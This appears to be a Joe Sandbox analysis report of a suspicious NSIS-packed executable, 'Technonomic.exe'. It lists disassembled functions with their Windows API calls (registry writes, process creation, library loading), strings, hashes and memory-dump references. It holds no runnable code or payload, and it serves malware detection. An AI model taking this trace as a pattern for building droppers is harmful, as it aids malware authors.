Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

Function 004057B1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
GetLastError.KERNEL32 ref: 00405808
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
GetLastError.KERNEL32 ref: 00405827

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3449924974-3821307424
Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Strings

artikulationer\Udsorteringerne, xrefs: 004023CA, 004023D8, 004023EF, 004023FF, 0040240A

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: artikulationer\Udsorteringerne
API String ID: 1356686001-2681483848
Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

Function 00406050 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE

Strings

: Completed, xrefs: 00406053

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

Function 00405D87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405DA5
GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0

Strings

nsa, xrefs: 00405D94
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D8C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2113348990
Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

Function 004064ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
wsprintfW.USER32 ref: 0040653F
LoadLibraryW.KERNELBASE(?), ref: 0040654F

Strings

%s%S.dll, xrefs: 00406539

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable
API String ID: 1892508949-550679374
Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405C98
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0), ref: 00405CA8

Strings

P_B, xrefs: 00405C45

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E

Function 00405863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
CloseHandle.KERNEL32(0040A230), ref: 00405899

Strings

Error launching installer, xrefs: 00405876

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78

Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
